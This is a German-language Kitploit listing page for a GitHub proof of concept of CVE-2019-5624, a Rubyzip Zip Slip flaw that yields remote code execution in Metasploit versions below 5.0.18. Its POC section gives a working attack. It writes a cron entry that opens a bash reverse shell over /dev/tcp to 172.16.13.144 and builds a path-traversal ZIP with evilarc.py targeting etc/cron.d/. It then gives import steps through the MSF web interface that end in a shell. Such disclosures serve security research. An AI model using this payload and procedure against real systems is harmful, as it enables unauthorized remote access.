Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2019-5624 — Ein Proof of Concept für Metasploits CVE-2019-5624-Schwachstelle (Rubyzip unsichere ZIP-Behandlung RCE) | Kitploit
Tools/GitHubGitHub/voidsec/cve-2019-5624
Exploit-FrameworksSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsPayload-Entwicklung
GitHubvoidsec/cve-2019-5624

CVE-2019-5624

Ein Proof of Concept für Metasploits CVE-2019-5624-Schwachstelle (Rubyzip unsichere ZIP-Behandlung RCE)

Repository anzeigen
1353vor 7 JahrenNoch nicht geprüft
Webseite

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2019-5624

Ein Proof of Concept für die Metasploit-Sicherheitslücke CVE-2019-5624 (Rubyzip unsichere ZIP-Verarbeitung RCE)

Einleitung

Im Februar 2019 fand ich eine neue Sicherheitslücke in der Rubyzip-Bibliothek. Sie ermöglicht einem Angreifer, unsichere ZIP-Verarbeitung (Zip Slip) auszunutzen, was zu einer Remote-Code-Ausführung führt.

Diese Sicherheitslücke wurde gegen alle Metasploit-Versionen < 5.0.18 genutzt (Metasploit Wrap-Up).

Ich habe einen detaillierten Blogbeitrag verfasst, der die Sicherheitslücke erklärt.

POC

  • Erstellen Sie eine Datei mit folgendem Inhalt:
root@kitploit:~
* * * * * root /bin/bash -c "exec /bin/bash0</dev/tcp/172.16.13.144/4444 1>&0 2>&0 0<&196;exec196<>/dev/tcp/172.16.13.144/4445; bash <&196 >&196 2>&196"
  • Generieren Sie das ZIP-Archiv mit der Path-Traversal-Nutzlast:
root@kitploit:~
python evilarc.py exploit --os unix -p etc/cron.d/
  • Fügen Sie dem ZIP-Archiv einen gültigen MSF-Arbeitsbereich hinzu (damit MSF es extrahiert, andernfalls wird die Verarbeitung des ZIP-Archivs verweigert)
  • Richten Sie zwei Listener ein, einen auf Port 4444 und den anderen auf Port 4445 (der auf Port 4445 erhält die Reverse Shell)
  • Melden Sie sich in der MSF-Weboberfläche an
  • Erstellen Sie ein neues „Projekt“
  • Wählen Sie „Importieren“, „Aus Datei“, wählen Sie die bösartige ZIP-Datei aus und klicken Sie schließlich auf die Schaltfläche „Importieren“
  • Warten Sie, bis der Importvorgang abgeschlossen ist
  • Genießen Sie Ihre Reverse Shell
  • Video

    Tool herunterladen